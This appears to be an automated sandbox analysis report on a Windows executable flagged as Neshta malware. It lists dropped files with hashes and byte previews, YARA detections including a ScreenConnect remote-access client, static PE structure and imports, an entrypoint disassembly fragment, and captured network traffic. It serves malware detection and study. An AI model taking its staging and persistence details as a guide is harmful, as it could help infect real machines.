                                                                        Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                        C:\Windows\Installer\MSI13D3.tmp
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):207360
                                                                        Entropy (8bit):6.573348437503042
                                                                        Encrypted:false
                                                                        SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                        MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                        SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                        SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                        SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                        Malicious:false
                                                                        Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                        C:\Windows\Installer\MSIDF1.tmp
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):628836
                                                                        Entropy (8bit):6.574722557682612
                                                                        Encrypted:false
                                                                        SSDEEP:12288:kuH2anwohwQUv9uH2anwohwQUv5uH2anwohwQUvx:kurhwQUv9urhwQUv5urhwQUvx
                                                                        MD5:A23528002B8FCE676EE9E7BC9CA836E5
                                                                        SHA1:6F8B987FFE76BF424BFC747F80BFBA8E27DA9BD8
                                                                        SHA-256:22C2A7F12327568BBC5EB0D837DC4BB0287AFB41F61BCF4AC935A78E1488540F
                                                                        SHA-512:FCA7522C28C010EED1FDECDFB048C1C59475858B710D21D0795B9103F3605AB4431B2E309689AC04E372BDCC0F23AB818313892258C23256146717340D569FF9
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSIDF1.tmp, Author: Joe Security
                                                                        Preview: ...@IXOS.@.....@..AS.@.....@.....@.....@.....@.....@......&.{88CF3F24-93A2-493E-BA63-1D8CC976DBBA}'.ScreenConnect Client (77af187dd37f08fd)..setup.msi.@.....@Qb...@.....@......DefaultIcon..&.{9C0A6111-B899-49EE-9A79-EF61274BA5E5}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (77af187dd37f08fd)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{4768BE46-975A-455C-AF15-61A15FE629A4}7.C:\ProgramData\ScreenConnect Client (77af187dd37f08fd)\.@.......@.....@.....@......&.{6DCE5A21-0DC7-4711-A8DC-2DDE062B4424}^.C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{4131B28B-C591-485C-81BB-59C107C8780A}^.C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe.@.......@.....@.....@......&.{65DC5071-7A1F-4E32-8C11-DC3D60C6
                                                                        C:\Windows\Installer\MSIDF2.tmp
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):207360
                                                                        Entropy (8bit):6.573348437503042
                                                                        Encrypted:false
                                                                        SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                        MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                        SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                        SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                        SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                        Malicious:false
                                                                        Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                        C:\Windows\Installer\MSIFE7.tmp
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):207360
                                                                        Entropy (8bit):6.573348437503042
                                                                        Encrypted:false
                                                                        SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                        MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                        SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                        SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                        SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                        Malicious:false
                                                                        Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                        C:\Windows\Installer\{88CF3F24-93A2-493E-BA63-1D8CC976DBBA}\DefaultIcon
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:MS Windows icon resource - 3 icons, 16x16 withPNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 withPNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                        Category:dropped
                                                                        Size (bytes):435
                                                                        Entropy (8bit):5.289734780210945
                                                                        Encrypted:false
                                                                        SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
                                                                        MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                                        SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                                        SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                                        SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                                        Malicious:false
                                                                        Preview: ..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.
                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):94
                                                                        Entropy (8bit):4.576182466583999
                                                                        Encrypted:false
                                                                        SSDEEP:3:MKVRUjJ6fF20i2OFNRgLLLC1wK+SOv:MKHqg321wK+SOv
                                                                        MD5:5B718604B8883B24330B4E20AAA2F010
                                                                        SHA1:B5D9BC4099CBD73D0EC33122A2AE40B63D749A3F
                                                                        SHA-256:962565458723129DFD7F08EFEA317307868A974C1E3A0FEF5187AB61639DFB23
                                                                        SHA-512:11C085604EC58610328FA1000BE72187B33C1DA4E23FF32A6F8D7E84F83699DD9E267A988EA2B51F160A3BE933F9BE21AB4BFC6C5DE2538E66151398CC5E1E98
                                                                        Malicious:false
                                                                        Preview: 10/01/2021 21:52:30.551 [5648]: Setting MSI handle, install logging will go into the MSI log..
                                                                        C:\Windows\directx.sys
                                                                        Process:C:\Windows\svchost.com
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):66
                                                                        Entropy (8bit):4.222593650305007
                                                                        Encrypted:false
                                                                        SSDEEP:3:oXeFA7kyYeFA7n:oXe67kyYe67n
                                                                        MD5:C5691EEA78451675BB8A46B32223CE08
                                                                        SHA1:3448C990CA3C992539F781954FA63A1B1ADC33B7
                                                                        SHA-256:61952E3207119C3D2117B2A246B6E67562BF6917198AF8EC530710C3F283B08A
                                                                        SHA-512:515F50DC21C6BC0343F0518AA6B9400B7C8D38F980831DF587AA182D830C596546C2D35F02ECDCA0716CC91CF7040BBA7D416DC17984B923258DDF8AEF6130E8
                                                                        Malicious:true
                                                                        Preview: C:\Windows\System32\msiexec.exe..C:\Windows\System32\msiexec.exe..
                                                                        C:\Windows\svchost.com
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):41472
                                                                        Entropy (8bit):5.976684810818399
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ:JxqjQ+P04wsmJC
                                                                        MD5:36FD5E09C417C767A952B4609D73A54B
                                                                        SHA1:299399C5A2403080A5BF67FB46FAEC210025B36D
                                                                        SHA-256:980BAC6C9AFE8EFC9C6FE459A5F77213B0D8524EB00DE82437288EB96138B9A2
                                                                        SHA-512:1813A6A5B47A9B2CD3958CF4556714AE240F2AA19D0A241B596830F0F2B89A33EC864D00CE6A791D323A58DFBFF42A0FDED65EEFBF980C92685E25C0EC415D92
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Windows\svchost.com, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Windows\svchost.com, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.184289235097817
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.19%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.15%
                                                                        • Win32 Executable Borland Delphi 6 (262906/60) 1.29%
                                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.20%
                                                                        • Win32 Executable Delphi generic (14689/80) 0.07%
                                                                        File name:$RUX313H.exe
                                                                        File size:4193672
                                                                        MD5:08ea055b45225ec89643836bae3c0446
                                                                        SHA1:dad2ac19848eb8361e735323d4581e6a724d5b39
                                                                        SHA256:2abf676ca2b221ca6dd7bd11facf8d003dff541ad4d5618cb86b39e9bfdb906e
                                                                        SHA512:fc96d096979ce7184398fecfdf9665911b8b087879ddff4a27817225b8bd8c201fcc3cf1072f38a903ff962465a012975ac00f2d845583f874c047547d0dbc15
                                                                        SSDEEP:49152:gbegT0+TL3Z0Mi963PSuIiH7efPKJqqLGVgM/1n7CJGcU3UPXGuI8Ewj1gf:p316Q6efPuPLC1n7CQcmIG7u0
                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                        File Icon

                                                                        Icon Hash:00828e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4080e4
                                                                        Entrypoint Section:CODE
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:9f4693fc0c511135129493f2161d1e86

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        add esp, FFFFFFE0h
                                                                        xor eax, eax
                                                                        mov dword ptr [ebp-20h], eax
                                                                        mov dword ptr [ebp-18h], eax
                                                                        mov dword ptr [ebp-1Ch], eax
                                                                        mov dword ptr [ebp-14h], eax
                                                                        mov eax, 00408054h
                                                                        call 00007FD9A8D9DD07h
                                                                        xor eax, eax
                                                                        push ebp
                                                                        push 00408220h
                                                                        push dword ptr fs:[eax]
                                                                        mov dword ptr fs:[eax], esp
                                                                        mov eax, 004091A8h
                                                                        mov ecx, 0000000Bh
                                                                        mov edx, 0000000Bh
                                                                        call 00007FD9A8DA0E51h
                                                                        mov eax, 004091B4h
                                                                        mov ecx, 00000009h
                                                                        mov edx, 00000009h
                                                                        call 00007FD9A8DA0E3Dh
                                                                        mov eax, 004091C0h
                                                                        mov ecx, 00000003h
                                                                        mov edx, 00000003h
                                                                        call 00007FD9A8DA0E29h
                                                                        mov eax, 004091DCh
                                                                        mov ecx, 00000003h
                                                                        mov edx, 00000003h
                                                                        call 00007FD9A8DA0E15h
                                                                        mov eax, dword ptr [00409210h]
                                                                        mov ecx, 0000000Bh
                                                                        mov edx, 0000000Bh
                                                                        call 00007FD9A8DA0E01h
                                                                        call 00007FD9A8DA0E58h
                                                                        lea edx, dword ptr [ebp-14h]
                                                                        xor eax, eax
                                                                        call 00007FD9A8D9E742h
                                                                        mov eax, dword ptr [ebp-14h]
                                                                        call 00007FD9A8D9ECD6h
                                                                        cmp eax, 0000A200h
                                                                        jle 00007FD9A8DA1EF7h
                                                                        call 00007FD9A8DA13D6h
                                                                        call 00007FD9A8DA1BE9h
                                                                        mov eax, 004091C4h
                                                                        mov ecx, 00000003h
                                                                        mov edx, 00000003h

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x150000x864.idata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000x1400.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000x5cc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x170000x18.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        CODE0x10000x722c0x7400False0.617355872845data6.51167217489IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        DATA0x90000x2180x400False0.3623046875data3.15169834056IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        BSS0xa0000xa8990x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .idata0x150000x8640xa00False0.37421875data4.17385976895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .tls0x160000x80x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x170000x180x200False0.05078125data0.206920017787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .reloc0x180000x5cc0x600False0.848307291667data6.44309346589IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x190000x14000x1400False0.1302734375data1.29674401743IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_ICON0x191500x10a8dataRussianRussia
                                                                        RT_RCDATA0x1a1f80x10data
                                                                        RT_RCDATA0x1a2080xacdata
                                                                        RT_GROUP_ICON0x1a2b40x14dataRussianRussia

                                                                        Imports

                                                                        DLLImport
                                                                        kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                        user32.dllGetKeyboardType, MessageBoxA
                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                        oleaut32.dllSysFreeString, SysReAllocStringLen
                                                                        kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                        advapi32.dllRegSetValueExA, RegOpenKeyExA, RegCloseKey
                                                                        kernel32.dllWriteFile, WinExec, SetFilePointer, SetFileAttributesA, SetEndOfFile, SetCurrentDirectoryA, ReleaseMutex, ReadFile, GetWindowsDirectoryA, GetTempPathA, GetShortPathNameA, GetModuleFileNameA, GetLogicalDriveStringsA, GetLocalTime, GetLastError, GetFileSize, GetFileAttributesA, GetDriveTypeA, GetCommandLineA, FreeLibrary, FindNextFileA, FindFirstFileA, FindClose, DeleteFileA, CreateMutexA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                        gdi32.dllStretchDIBits, SetDIBits, SelectObject, GetObjectA, GetDIBits, DeleteObject, DeleteDC, CreateSolidBrush, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, BitBlt
                                                                        user32.dllReleaseDC, GetSysColor, GetIconInfo, GetDC, FillRect, DestroyIcon, CopyImage, CharLowerBuffA
                                                                        shell32.dllShellExecuteA, ExtractIconA

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        RussianRussia

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        10/01/21-21:51:23.804183ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.1192.168.2.4
                                                                        10/01/21-21:51:30.696205ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.1192.168.2.4
                                                                        10/01/21-21:51:40.875575ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.1192.168.2.4

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 1, 2021 21:51:39.199868917 CEST49728443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:51:39.199908018 CEST44349728145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:51:39.199989080 CEST49728443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:51:39.921807051 CEST49728443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:51:39.921830893 CEST44349728145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:51:39.922003031 CEST44349728145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:51:40.366435051 CEST49729443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:51:40.366483927 CEST44349729145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:51:40.366575003 CEST49729443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:51:40.648279905 CEST49729443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:51:40.648325920 CEST44349729145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:51:40.648425102 CEST44349729145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:51:43.291138887 CEST49732443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:51:43.291187048 CEST44349732145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:51:43.292344093 CEST49732443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:51:43.602549076 CEST49732443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:51:43.602590084 CEST44349732145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:51:43.602746010 CEST44349732145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:51:47.659250021 CEST49733443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:51:47.659311056 CEST44349733145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:51:47.659430981 CEST49733443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:51:47.946603060 CEST49733443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:51:47.946636915 CEST44349733145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:51:47.946777105 CEST44349733145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:51:54.428282976 CEST49734443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:51:54.428348064 CEST44349734145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:51:54.428487062 CEST49734443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:51:55.107616901 CEST49734443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:51:55.107683897 CEST44349734145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:51:55.107810974 CEST44349734145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:52:04.614422083 CEST49736443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:52:04.614456892 CEST44349736145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:52:04.614533901 CEST49736443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:52:04.909526110 CEST49736443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:52:04.909555912 CEST44349736145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:52:04.909663916 CEST44349736145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:52:19.880145073 CEST49772443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:52:19.880202055 CEST44349772145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:52:19.880306005 CEST49772443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:52:20.143433094 CEST49772443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:52:20.143482924 CEST44349772145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:52:20.143646002 CEST44349772145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:52:42.685518026 CEST49806443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:52:42.685563087 CEST44349806145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:52:42.685736895 CEST49806443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:52:43.046314001 CEST49806443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:52:43.046345949 CEST44349806145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:52:43.046416044 CEST44349806145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:53:16.828896046 CEST49811443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:53:16.828944921 CEST44349811145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:53:16.829081059 CEST49811443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:53:17.123565912 CEST49811443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:53:17.123605967 CEST44349811145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:53:17.123718023 CEST44349811145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:54:08.420073032 CEST49812443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:54:08.420125961 CEST44349812145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:54:08.420243025 CEST49812443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:54:08.607199907 CEST49812443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:54:08.607230902 CEST44349812145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:54:08.607424021 CEST44349812145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:55:25.051428080 CEST49813443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:55:25.051481009 CEST44349813145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:55:25.051614046 CEST49813443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:55:25.208882093 CEST49813443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:55:25.208918095 CEST44349813145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:55:25.209008932 CEST44349813145.40.105.136192.168.2.4

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 1, 2021 21:51:23.804115057 CEST65299274192.168.2.4192.168.2.1
                                                                        Oct 1, 2021 21:51:30.696145058 CEST65299274192.168.2.4192.168.2.1
                                                                        Oct 1, 2021 21:51:39.173830032 CEST6454953192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:51:39.189588070 CEST53645498.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:51:40.349257946 CEST6315353192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:51:40.363372087 CEST53631538.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:51:40.875504017 CEST65299274192.168.2.4192.168.2.1
                                                                        Oct 1, 2021 21:51:43.203177929 CEST5299153192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:51:43.216849089 CEST53529918.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:51:43.272902966 CEST5370053192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:51:43.288008928 CEST53537008.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:51:47.643362045 CEST5172653192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:51:47.657860041 CEST53517268.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:51:54.412354946 CEST5679453192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:51:54.426678896 CEST53567948.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:52:02.843950987 CEST5653453192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:52:02.857548952 CEST53565348.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:52:04.599450111 CEST5662753192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:52:04.613214016 CEST53566278.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:52:09.137598991 CEST5662153192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:52:09.215039015 CEST53566218.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:52:10.192630053 CEST6311653192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:52:10.228168011 CEST53631168.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:52:10.629077911 CEST6407853192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:52:10.642864943 CEST53640788.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:52:11.649523973 CEST6480153192.168.2.48.8.8.8
